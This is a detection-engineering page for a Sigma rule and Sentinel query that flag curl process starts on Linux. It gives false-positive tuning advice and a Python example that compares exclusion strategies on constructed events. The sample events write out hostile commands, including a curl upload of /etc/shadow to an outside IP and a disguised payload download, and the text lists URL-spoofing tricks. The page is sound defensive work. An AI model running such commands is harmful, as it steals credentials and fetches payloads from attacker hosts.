Curl is present on almost every Linux host, which is exactly why adversaries reach for it: a curl process start can indicate an attacker fetching a second-stage payload (MITRE ATT&CK T1105, Ingress Tool Transfer), beaconing to a command-and-control server, or pushing data out with an HTTPS POST. The same process start is also produced all day long by installer scripts, cron jobs and administrators, so the rule below is rated low and is better used as a hunting query and a correlation building block in Microsoft Sentinel (formerly Azure Sentinel) than as a standalone alert. SOC teams should hunt for it proactively and tune it against the false-positive scenarios at the end of this page so that genuine tool transfer and exfiltration stand out early.
Detection Rule
title: Curl Usage on Linux
id: ea34fb97-e2c4-4afb-810f-785e4459b194
status: test
description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: low
imProcessCreate
| where TargetProcessName endswith "/curl"
Scenario: Package or repository setup fetched with curl (e.g., a vendor "curl -fsSL https://... | sh" repository installer, or an admin script pulling release files from a distribution mirror). Note that apt, yum and dnf themselves download through their own HTTP client or libcurl and do not spawn a /curl process, so a routine package update will not fire this rule.
Filter/Exclusion: Allowlist the exact mirror hostname (e.g., archive.ubuntu.com) parsed from the URL in CommandLine, together with the launching script (ActingProcessName / ActingProcessCommandLine in imProcessCreate). Do not exclude on a bare substring such as CommandLine contains "apt" or "yum": the attacker controls the URL path and can simply name the payload /apt/update.sh.
Scenario: Scheduled job using curl to fetch a configuration file from an internal server
Filter/Exclusion: cron and systemd never appear in curl's own command line; they appear as the launching process (ActingProcessName such as /usr/sbin/cron or the service executable started by a systemd timer). Exclude the specific parent plus the specific internal destination host, not every cron-spawned curl: cron is a standard persistence mechanism (T1053.003), and curl in a cron job pulling from an unknown host is precisely what this rule should surface. Filtering on private ranges (e.g., 10.0.0.0/8) is only a weak signal, since a compromised internal host is a common staging point.
Scenario: Admin task using curl to test a web service or API endpoint
Filter/Exclusion: Do not exclude privileged accounts such as root or admin; attackers operate as root after privilege escalation, and web shells run as service accounts. Allowlist the known internal endpoint by exact hostname and path (e.g., /health, /status), and only narrow further by named administrator accounts in combination with that host restriction, never by account alone.
Scenario: Log collection tool using curl to send logs to a centralized logging server
Filter/Exclusion: Shippers such as fluentd and logstash post over their own HTTP output plugins, so curl here usually comes from a wrapper shell script around them. Identify that script by ActingProcessName / ActingProcessCommandLine and pin the destination to the central logging host: a curl POST of a file is indistinguishable from exfiltration except by where it goes.
Scenario: CI/CD pipeline using curl to fetch dependencies or artifacts from a private registry
Filter/Exclusion: Filter on the runner as the launching process (e.g., the Jenkins agent's java process or gitlab-runner and the build shell it spawns) together with the registry hostname parsed from the URL. Compare the parsed hostname for equality rather than checking that the command line contains https://registry.example.com: a substring check also accepts https://registry.example.com.attacker.example/ and https://registry.example.com@203.0.113.9/.
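The following is an added example and not part of the original page, the Sigma rule, or Sentinel: it applies the rule's selection to a handful of constructed process events shaped like imProcessCreate rows and compares the command-line-substring and privileged-user exclusions with exclusions anchored on the launching process and the parsed URL hostname. Every event, host, account and allowlist entry is constructed for illustration.

```python
"""Added example (not from the original page or the Sigma rule): curl
process_creation detection plus two styles of false-positive exclusion,
evaluated over constructed ASIM-style process events."""
import shlex
from urllib.parse import urlparse

# Constructed sample rows shaped like imProcessCreate columns (not real telemetry).
EVENTS = [
    # 0: admin script pulling a release file from a distro mirror (benign)
    {"ActingProcessName": "/usr/bin/bash", "ActorUsername": "root",
     "TargetProcessName": "/usr/bin/curl",
     "TargetProcessCommandLine": "curl -fsSL https://archive.ubuntu.com/ubuntu/dists/jammy/InRelease -o /tmp/InRelease"},
    # 1: cron job fetching a config file from an internal server (benign)
    {"ActingProcessName": "/usr/sbin/cron", "ActorUsername": "svc-config",
     "TargetProcessName": "/usr/bin/curl",
     "TargetProcessCommandLine": "curl -s http://10.20.30.40/config/app.yaml -o /etc/app/app.yaml"},
    # 2: web-shell download whose URL path was chosen to contain "apt" and "yum"
    {"ActingProcessName": "/usr/bin/bash", "ActorUsername": "www-data",
     "TargetProcessName": "/usr/bin/curl",
     "TargetProcessCommandLine": "curl -s http://203.0.113.9/apt/yum-update.sh -o /tmp/.x"},
    # 3: exfiltration of /etc/shadow from a root-owned cron job
    {"ActingProcessName": "/usr/sbin/cron", "ActorUsername": "root",
     "TargetProcessName": "/usr/bin/curl",
     "TargetProcessCommandLine": "curl -d @/etc/shadow https://203.0.113.9/upload"},
    # 4: not curl at all; must never match the rule
    {"ActingProcessName": "/usr/bin/bash", "ActorUsername": "root",
     "TargetProcessName": "/usr/bin/wget",
     "TargetProcessCommandLine": "wget -q https://archive.ubuntu.com/ubuntu/dists/jammy/Release"},
]

# Hypothetical tuning allowlist: launching process + exact hosts (+ optional account).
ALLOWLIST = [
    {"acting": "/usr/sbin/cron", "user": "svc-config", "hosts": {"10.20.30.40"}},
    {"acting": "/usr/bin/bash", "user": None, "hosts": {"archive.ubuntu.com"}},
]


def matches_rule(ev):
    """Sigma selection Image|endswith '/curl', i.e. TargetProcessName endswith "/curl"."""
    return ev["TargetProcessName"].endswith("/curl")


def url_hosts(cmdline):
    """Hostnames of every http(s) URL on the curl command line.

    Only fully qualified URLs are parsed; a scheme-less 'curl host/path' yields
    an empty set, so the anchored exclusion below falls through to alerting.
    """
    hosts = set()
    for tok in shlex.split(cmdline):
        parsed = urlparse(tok)
        if parsed.scheme in ("http", "https") and parsed.hostname:
            hosts.add(parsed.hostname)  # userinfo tricks resolve to the real host
    return hosts


def naive_exclude(ev):
    """Exclusions as a substring/user filter: command line contains apt, yum or
    the mirror name, or the account is root/admin. Both are attacker-controlled."""
    cmd = ev["TargetProcessCommandLine"]
    if any(s in cmd for s in ("apt", "yum", "archive.ubuntu.com")):
        return True
    return ev["ActorUsername"] in ("root", "admin")


def anchored_exclude(ev):
    """Exclude only when the launching process, the account (if pinned) and
    every destination host match a single allowlist entry (fail closed)."""
    hosts = url_hosts(ev["TargetProcessCommandLine"])
    if not hosts:
        return False
    for entry in ALLOWLIST:
        if ev["ActingProcessName"] != entry["acting"]:
            continue
        if entry["user"] is not None and ev["ActorUsername"] != entry["user"]:
            continue
        if hosts <= entry["hosts"]:
            return True
    return False


def alerts(events, exclude):
    """Indices of events that match the rule and survive the exclusion."""
    return [i for i, ev in enumerate(events) if matches_rule(ev) and not exclude(ev)]


if __name__ == "__main__":
    print("naive exclusions    ->", alerts(EVENTS, naive_exclude))     # [1]
    print("anchored exclusions ->", alerts(EVENTS, anchored_exclude))  # [2, 3]
```

With the substring/user filter the only surviving alert is the benign cron job (index 1), while the disguised download (2) and the root cron exfiltration (3) are silently dropped; the anchored allowlist inverts that, suppressing the two benign events and alerting on both malicious ones. In Sentinel the same shape is a KQL query that extracts the URL from CommandLine, takes its host with parse_url(), and performs a join kind=leftanti against a watchlist keyed on ActingProcessName and host.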